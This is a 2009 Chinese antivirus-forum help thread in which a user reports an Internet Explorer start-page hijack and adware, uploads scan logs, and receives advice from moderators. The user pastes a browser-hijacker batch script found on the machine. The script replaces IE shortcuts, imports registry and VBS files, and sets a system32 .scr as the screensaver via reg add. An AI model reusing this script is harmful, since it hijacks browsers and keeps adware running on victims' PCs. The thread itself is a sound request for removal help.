求救``` - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 反病毒/反流氓软件论坛求救```

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第五十次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

12 3

1 / 3 页

跳转页

[求助] 求救```

本主题由版主天月来了于 2009-7-8 14:31:15 执行合并主题操作

╬完美人生灬初生襁褓狮帖子:13 注册: 2009-07-06 来自:	发表于： 2009-07-06 16:40 \| 只看楼主短消息资料字号：小中大 1楼求救``` 程序名称：C:\WINDOWS\SYSTEM32\REG.EXE 修改 HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\START PAGE 由 about:blank 修改为 http://www.net.cn.jiemei.xpdao.cn/blankblankblankblankblankblankblankblankblankblank.htm 用了瑞星没发现病毒. 360发现恶意插件ab365live清理不掉.任务管理器280+ 指点哈``!!!!! 用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ) 附件: 文件名:SREngLOG4.rar 下载次数:201 文件类型:application/octet-stream 文件大小: 上传时间:2009-7-6 23:17:06 描述:rar ╬完美人生灬最后编辑于 2009-07-06 23:17:06
╬完美人生灬初生襁褓狮帖子:13 注册: 2009-07-06 来自:	分享到：

╬完美人生灬初生襁褓狮帖子:13 注册: 2009-07-06 来自:	发表于： 2009-07-06 16:41 \| 只看楼主短消息资料字号：小中大 2楼回复：求救``` 急急急
╬完美人生灬初生襁褓狮帖子:13 注册: 2009-07-06 来自:

networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:	发表于： 2009-07-06 16:43 \| 短消息资料字号：小中大 3楼回复 1F ╬完美人生灬的帖子反病毒区求助，上传sreng日志。
networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:

是昔流芳卡卡反病毒小组帖子:646 注册: 2009-05-10 来自:青鸾峰	发表于： 2009-07-06 21:03 \| 短消息资料字号：小中大 4楼回复: 求救``` 这应该是一个历史记录，楼主的主页有没有被修改？如果总是这样提示，可以给该键值设个权限权限截图00.png (41.40 K) 2009-7-6 21:03:25 然后上传sreng日志是昔流芳最后编辑于 2009-07-06 21:04:51 My Blog
是昔流芳卡卡反病毒小组帖子:646 注册: 2009-05-10 来自:青鸾峰

╬完美人生灬初生襁褓狮帖子:13 注册: 2009-07-06 来自:	发表于： 2009-07-08 14:07 \| 只看楼主短消息资料字号：小中大 5楼高手显身`日字程序名称：C:\WINDOWS\SYSTEM32\REG.EXE 修改 HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\START PAGE 由 about:blank 修改为 http://www.net.cn.jiemei.xpdao.cn/blankblankblankblankblankblankblankblankblankblank.htm 前几天发过了.我自己简单处理以为没问题今天又是这情况.360发现恶意软件ab365live 用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ) 附件: 文件名:SREngLOG5555.rar 下载次数:158 文件类型:application/octet-stream 文件大小: 上传时间:2009-7-8 14:07:06 描述:rar ╬完美人生灬最后编辑于 2009-07-08 14:15:01
╬完美人生灬初生襁褓狮帖子:13 注册: 2009-07-06 来自:

╬完美人生灬初生襁褓狮帖子:13 注册: 2009-07-06 来自:	发表于： 2009-07-08 14:30 \| 只看楼主短消息资料字号：小中大 6楼回复：高手显身`日字 @echo off start zbhtzser.htm regedit /s zbhtsert.reg start zbhteiala.vbs copy "Internet Explorer.lnk" "%userprofile%\桌面\Internet Explorer.lnk" /y copy "Internet Explorer.lnk" "%userprofile%\「开始」菜单\Internet Explorer.lnk" /y copy "Internet Explorer.lnk" "%userprofile%\「开始」菜单\程序\Internet Explorer.lnk" /y copy "Internet Explorer.lnk" "%userprofile%\Application Data\Microsoft\Internet Explorer\Quick Launch\启动 Internet Explorer 浏览器.lnk" /y copy "Internet Explorer.lnk" "%userprofile%\Application Data\Microsoft\Internet Explorer\Quick Launch\Internet Explorer.lnk" /y copy "baobao.lnk" "%userprofile%\桌面\淘宝购物.lnk" /y del "%userprofile%\桌面\IEXPLORE.lnk" del "%userprofile%\桌面\IEXPLOREr.lnk" del "%userprofile%\桌面\Internet Explorer.lnk" del "%userprofile%\Application Data\Microsoft\Internet Explorer\Quick Launch\Internet Explorer.lnk" del "%userprofile%\Application Data\Microsoft\Internet Explorer\Quick Launch\启动 Internet Explorer 浏览器.lnk" @reg add "HKEY_CURRENT_USER\Control Panel\desktop" /v "SCRNSAVE.EXE" /t reg_sz /d C:\WINDOWS\system32\ucze.scr /f @reg add "HKEY_CURRENT_USER\Control Panel\desktop" /v "ScreenSaveActive" /t reg_sz /d 1 /f @reg add "HKEY_CURRENT_USER\Control Panel\desktop" /v "ScreenSaveTimeOut" /t reg_sz /d 60 /f exit 这是什么???
╬完美人生灬初生襁褓狮帖子:13 注册: 2009-07-06 来自:

天月来了版主帖子:76904 注册: 2007-02-06 来自:	发表于： 2009-07-08 14:36 \| 短消息资料字号：小中大 7楼回复：求救``` 去看看这个计划任务是什么。 ================================== 计划任务 [已禁用] $~$Sys0$.job C:\WINDOWS\System32\rundll32.exe 百年以后，你的墓碑旁刻着的名字不是我
天月来了版主帖子:76904 注册: 2007-02-06 来自:

╬完美人生灬初生襁褓狮帖子:13 注册: 2009-07-06 来自:	发表于： 2009-07-08 15:46 \| 只看楼主短消息资料字号：小中大 8楼回复: 求救``` 引用: 原帖由天月来了于 2009-7-8 14:36:00 发表去看看这个计划任务是什么。 ================================== 计划任务 [已禁用] $~$Sys0$.job C:\WINDOWS\System32\rundll32.exe 在哪里看??? 未命名5555.jpg (36.22 K) 2009-7-8 15:45:40
╬完美人生灬初生襁褓狮帖子:13 注册: 2009-07-06 来自:

╬完美人生灬初生襁褓狮帖子:13 注册: 2009-07-06 来自:	发表于： 2009-07-08 15:50 \| 只看楼主短消息资料字号：小中大 9楼回复: 求救``` 未命名0000.jpg (431.69 K) 2009-7-8 15:50:02 就这东西一点就遭!! 引用: 原帖由 ╬完美人生灬于 2009-7-8 14:30:00 发表 @echo off start zbhtzser.htm regedit /s zbhtsert.reg start zbhteiala.vbs copy "Internet Explorer.lnk" "%userprofile%\桌面\Internet Explorer.lnk" /y copy "Internet Explorer
╬完美人生灬初生襁褓狮帖子:13 注册: 2009-07-06 来自:

天月来了版主帖子:76904 注册: 2007-02-06 来自:	发表于： 2009-07-08 15:53 \| 短消息资料字号：小中大 10楼回复：求救``` 控制面板里找你的计划任务，不是找那C:\WINDOWS\System32\rundll32.exe 文件。那只是那计划任务要调用系统重要程序C:\WINDOWS\System32\rundll32.exe 工作而已其工作起来的东西很可能就是启动cmd和reg的两程序的。不知道什么叫计划任务，就百度嘛，立即可知百年以后，你的墓碑旁刻着的名字不是我
天月来了版主帖子:76904 注册: 2007-02-06 来自:

<<上一主题|下一主题>>

12 3

1 / 3 页

跳转页

页面顶部

Powered by Discuz!NT